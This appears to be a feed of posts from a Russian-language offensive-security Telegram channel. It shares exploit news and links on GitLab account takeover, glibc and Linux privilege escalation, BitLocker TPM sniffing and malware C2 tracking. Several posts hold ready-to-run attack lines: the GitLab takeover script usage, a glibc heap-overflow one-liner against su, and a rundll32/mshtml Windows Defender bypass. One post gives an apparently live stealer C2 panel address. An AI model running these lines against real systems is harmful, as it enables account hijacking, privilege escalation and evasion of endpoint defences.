CVE-2023-7028-main.zip
4.8 KB
CVE-2023-7028 | Account-Take-Over Gitlab
*
usage:
#gitlab
*
usage:
python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -t my.target@example.com#gitlab
👍14🔥5
Linux Privileges Escalation Techniques (Basic to Advanced) Series
*
Part 1: http://hacklido.com/blog/158
Part 2: http://hacklido.com/blog/162
Part 3: http://hacklido.com/blog/210
Part 4: http://hacklido.com/blog/224
Part 5: https://hacklido.com/blog/286
*
Part 1: http://hacklido.com/blog/158
Part 2: http://hacklido.com/blog/162
Part 3: http://hacklido.com/blog/210
Part 4: http://hacklido.com/blog/224
Part 5: https://hacklido.com/blog/286
🔥15👍14
Наконец то была найдена Атлантида
На легендарный остров-государство обманным путем вывозят Telegram, Steam, данные криптовалютных кошельков, данные браузера, а также пушнину и женщин
РенТВ - call me
http://5.42.64.32/login.php C2 Panel
#cc #bot
На легендарный остров-государство обманным путем вывозят Telegram, Steam, данные криптовалютных кошельков, данные браузера, а также пушнину и женщин
РенТВ - call me
http://5.42.64.32/login.php C2 Panel
#cc #bot
😱19🔥7👍1
Linux Kernel Exploitation (свежая версия)
*
1 часть - Getting started & BOF
2 часть - Exploiting race-condition + UAF
3 часть - Heap techniques
#linux #kernel #hack
*
1 часть - Getting started & BOF
2 часть - Exploiting race-condition + UAF
3 часть - Heap techniques
#linux #kernel #hack
🔥15👍1
CVE-2023-6246:
Heap-based buffer overflow in the glibc's syslog
POC
всем сегфолта )))))
Heap-based buffer overflow in the glibc's syslog
POC
(exec -a "`printf '%0128000x' 1`" /usr/bin/su < /dev/null)всем сегфолта )))))
👌17
This media is not supported in your browser
VIEW IN TELEGRAM
Lenovo X1 Carbon Bitlocker Key Sniffing
круто, 42.9 секунды
круто, 42.9 секунды
🔥83😱16👌4👍2
Proxy Bar
Lenovo X1 Carbon Bitlocker Key Sniffing круто, 42.9 секунды
внесем немного конкретики о пинах
BitLocker Key retrieval on a Windows 11, Lenovo X1 Carbon Gen 11 via SPI Sniffing.
То есть на задней стороне материнки, есть тестовые пады, секурненько )))
*
Да, это TPM 2.0
*
Ну и почитать TPM SNIFFING
#bitlocker #sniff
BitLocker Key retrieval on a Windows 11, Lenovo X1 Carbon Gen 11 via SPI Sniffing.
То есть на задней стороне материнки, есть тестовые пады, секурненько )))
*
Да, это TPM 2.0
*
Ну и почитать TPM SNIFFING
#bitlocker #sniff
👍16🔥9👌1
В поисках malware инфраструктуры
*
Если вам интересно как ищут всякие
*
Исходя из статьи, можно немного прикрыть свой
*
Tracking Malware Infrastructure
#malware #c2
*
Если вам интересно как ищут всякие
opedir, или C&C со всякими cobalt-strike, havoc или малварь вроде dark comet, то есть интересная статья, в статье 11 примеров на базе censys.*
Исходя из статьи, можно немного прикрыть свой
C2 от любопытных глаз*
Tracking Malware Infrastructure
#malware #c2
🔥16👍2
This media is not supported in your browser
VIEW IN TELEGRAM
Xbox ? PlayStation ?
No
Ubiquiti switch !
No
Ubiquiti switch !
🔥71👍7😱5👌2
Windows Defender Detection Mitigation Bypass Vulnerability
Win LPE
В 2022 году hyp3rlinx рассказывал как можно обойти
*
то есть было и пофиксили:
магия запятой:
собака старая, трюки новые.
CVE пока не имеет )
#defender #bypass
Win LPE
В 2022 году hyp3rlinx рассказывал как можно обойти
windows defender передав дополнительный путь при ссылке на mshtml, дырку пофиксили. НО, добавив пару запятых в старый трюк - и опять bypass. *
то есть было и пофиксили:
C:\sec>rundll32.exe javanoscript:"\..\..\mshtml,RunHTMLApplication ";alert(666)магия запятой:
C:\sec>rundll32.exe javanoscript:"\..\..\mshtml,,RunHTMLApplication ";alert(666)собака старая, трюки новые.
CVE пока не имеет )
#defender #bypass
🔥61👍1😱1👌1